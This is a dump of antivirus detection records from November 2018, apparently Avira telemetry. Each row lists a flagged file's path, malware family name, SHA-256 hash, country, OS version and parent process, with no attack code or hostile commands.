  Row(detection=Row(filename='ccdixgqn.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\CcdixGqN.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150315-b1b0cceb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150315-B1B0CCEB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094948-ba5acc3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-094836-AAD64268\\AVSCAN-20181101-094948-BA5ACC3C', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:52:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134438-9ccb496c', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134413-6E913F09\\AVSCAN-20181101-134438-9CCB496C', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-145318-45dd717a', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-141018-1F4A17CE\\AVSCAN-20181104-145318-45DD717A', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='9600a7a82fa27381b6c5a23c81326e60b1b30a39d0b20feb6a066b67ef1ea05e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:53:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='logreader.exe', filepath='E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-04T07:21:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T19:49:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='keygen.exe', filepath='G:\\Converters\\VSO Software Blu-ray Converter Ultimate v1.2.1.19\\Keygen\\Keygen.exe', filesize=64000, name='TR/Offend.6983021.2.#M1.#R1'), hash='0f5529a785f44d09d9d9dae60892caf7b2851b2f1e05b342621060a03eeb0c3b', metadata=Row(cmdline=None, country='YE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskhost.exe', parentsize=49152, timestamp='2018-11-04T11:39:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='c:\\users\\X\\appdata\\local\\temp\\nscd65.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:00:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T08:05:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:49:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131043-14d5193a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131043-14D5193A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-31T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpavgio.dll\\\\\\"', country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-04T09:31:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='createlnk.dll', filepath='C:\\Program Files (x86)\\Hewlett-Packard\\OrderReminder\\CreateLnk.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='65ff6bf74e41d58d9d2fb4e8707bdbcaf30faef555369bb3f6b27fa7ef064ceb', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673040, timestamp='2018-11-04T17:13:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hegde sirsi-05-09-18 .exe', filepath='G:\\HEGDE SIRSI-05-09-18 .EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='16635418f3793f65a3739a733d3d24fe75af76761dad2aee98b39c8966d1a740', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T12:19:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000ca82', filepath='C:\\Windows\\Temp\\7a30636c-92b8-42df-aaca-53a67db85549\\tmp00000529\\tmp0000ca82', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='5b060d22ce097d6dd318271b58d073f170646491bf734e279e02f9c15adcc4e2', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.10.767.8917\\AdAwareService.exe', parentsize=712432, timestamp='2018-11-04T11:07:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='s0017mdfl.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$DRa0.605\\Gsm Box Cracked Full Pack By TCS\\AutoPlay\\Docs\\TM Miracle Falcon Box\\Bin\\s0017mdfl.dll', filesize=4992000, name='DR/Delphi.Gen.#M300.#R491'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Compressed\\\\\\\\Naveed\\\\\\\\Gsm Box Cracked Full Pack By TCS_2.rar\\\\\\"', country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1500560, timestamp='2018-11-04T17:23:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a34039da41e8bd1498f64832b01f916ae51e7f2a6d844cec49d24f167ab9058a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A34039DA41E8BD1498F64832B01F916AE51E7F2A6D844CEC49D24F167AB9058A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a34039da41e8bd1498f64832b01f916ae51e7f2a6d844cec49d24f167ab9058a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:39:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155759-bf8b1abe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a30d7e09\\AVSCAN-20181104-155541-AD193043\\AVSCAN-20181104-155759-BF8B1ABE', filesize=64000, name='HEUR/AGEN.1005197.#M1.#R1'), hash='6e0caa3a52c9120d42300ffe486ad13556ec31bde1d337ab4cf1c2b282e3afad', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:58:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T05:55:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe207_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe207 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T17:21:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155800-9450a13f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-155636-87422C05\\AVSCAN-20181104-155800-9450A13F', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:58:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093201-1eb23106', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d29325e0\\AVSCAN-20181104-091928-B5729A14\\AVSCAN-20181104-093201-1EB23106', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:33:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_175bd14d.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_175bd14d.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122638-dd83ae12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24c2bae8\\AVSCAN-20181104-121126-1AF5F320\\AVSCAN-20181104-122638-DD83AE12', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:09:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151752-90b717ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151714-8C8CE7AB\\AVSCAN-20181104-151752-90B717CE', filesize=512000, name='Adware/SpeedBit.ngud.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:17:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085046-e00d624a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638182e6\\AVSCAN-20181104-084918-D7A578FE\\AVSCAN-20181104-085046-E00D624A', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090110-3d4bf032', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-090110-3D4BF032', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:01:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154104-1f39e261', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638666ac\\AVSCAN-20181104-154039-1BDAEC7E\\AVSCAN-20181104-154104-1F39E261', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='to trinh bau bttndan.exe', filepath='G:\\\xa0\\HOI NGHI 2017\\TO TRINH BAU BTTNDAN.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='671529e197693aa9b48d4480ef080e84f0cc182f3587bffbf91c6388f468d1e0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T11:18:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215914-935bb6db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215914-935BB6DB', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:59:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T15:32:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212756-853140c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212756-853140C8', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:27:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1_16_3_4.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_16_3_4.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='047b368c71a6b2ac7f6a115c49d051a803d4338ca9d501ba4a99ff2915d1c3f1', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T09:21:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Stantinko.Gen.#M300.#R8142'), hash='4612cd30b31475fa303b4768a58bbd90331993e09f1dace8d07936d18425197e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:26:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T05:00:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c46c4f55575370e282438751bf32315cbc586bb28a4fe859a71414f44dd4ca0f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C46C4F55575370E282438751BF32315CBC586BB28A4FE859A71414F44DD4CA0F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c46c4f55575370e282438751bf32315cbc586bb28a4fe859a71414f44dd4ca0f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:08:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:47:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T06:37:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183528-cadf57b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_71203242\\AVSCAN-20181104-183428-BFADF2C5\\AVSCAN-20181104-183528-CADF57B4', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:35:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:50:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000124e', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000124e', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:50:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:29:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='9b5b52bfff96e7b21772f8e94be21b1bde8c8020', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\9b5b52bfff96e7b21772f8e94be21b1bde8c8020', filesize=896000, name='HEUR/AGEN.1003107.#M1.#R1'), hash='8864e86b889bee27a3f82473897562dbad35b5bf358c93047bdcc407e6f9a896', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:47:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-113823-37c5007e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0255a3\\AVSCAN-20181104-112225-BD1A616D\\AVSCAN-20181104-113823-37C5007E', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:38:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='8be32e9e-34fa-29ff-cab7-f9270af6bd8b.exe', filepath='G:\\\xa0\\{9fa9aac9-c45e-7dfa-290a-56ae3b9c6186}\\8be32e9e-34fa-29ff-cab7-f9270af6bd8b.exe', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:38:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:06:26Z'), dt=datetime.date(2018, 11, 4)),
